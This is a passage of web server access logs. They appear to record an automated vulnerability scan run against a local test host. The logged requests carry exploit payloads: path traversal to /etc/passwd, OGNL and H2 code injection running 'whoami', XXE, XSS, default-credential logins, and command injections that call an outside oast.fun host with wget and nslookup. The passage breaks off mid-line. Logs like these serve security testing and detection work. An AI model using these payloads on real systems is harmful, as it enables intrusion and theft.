HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"{\x0D\x0A \x22name\x22:\x22spring.datasource.hikari.connection-test-query\x22,\x0D\x0A \x22value\x22:\x22CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/env HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.orig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/neo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.original HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\x22cmd /c whoami\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /meta HTTP/1.1","status":"405","body_bytes_sents":"584","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/stc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_wpeprivate/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://c9v8h88smpv8c1ig07h0ygp6sjqk384ak.oast.fun)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/opcache.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.229","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"------WebKitFormBoundaryoZ8meKnrrso89R6Y\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22; filename=\x22../../../../../../../tmp/poc\x22\x0D\x0A\x0D\x0Atest-poc\x0D\x0A------WebKitFormBoundaryoZ8meKnrrso89R6Y--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x22297MTzHJgPb1GeMXt5MSB7lhkWt\x22,\x0D\x0A \x22Name\x22: \x22297MTzHJgPb1GeMXt5MSB7lhkWt\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup c9v8h88smpv8c1ig07h0tb1ayd77qnof1.oast.fun\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 